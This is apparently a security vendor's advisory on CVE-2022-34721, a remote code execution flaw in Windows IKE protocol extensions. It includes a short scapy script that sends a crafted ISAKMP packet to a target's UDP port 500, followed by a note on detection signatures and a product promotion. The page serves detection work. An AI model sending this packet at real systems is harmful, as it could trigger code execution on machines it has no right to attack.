top of page

Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution (CVE-2022-34721)



Application Details

Windows Internet Key Exchange (IKE) is used for Key Management in IPSec networks. Allowing automatic negotiation and creation of IPSec security associations between IPSec peers.


Vulnerability

Microsoft Windows could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the Internet Key Exchange (IKE) Protocol Extensions component.


Identification

By sending a specially crafted IP packet to a Windows node where IPSec is enabled, an attacker could exploit this vulnerability to execute arbitrary code on the system.


from scapy.all import *
from scapy.contrib.ikev2 import *
from scapy.layers.isakmp import *
import socket, time

target = ("192.168.159.134", 500)


sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)
pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")

sock.sendto(raw(pkt), target)

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to perform remote code execution on an affected system.


Coverage

Idappcom have created signature 8023073 for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Kommentare


bottom of page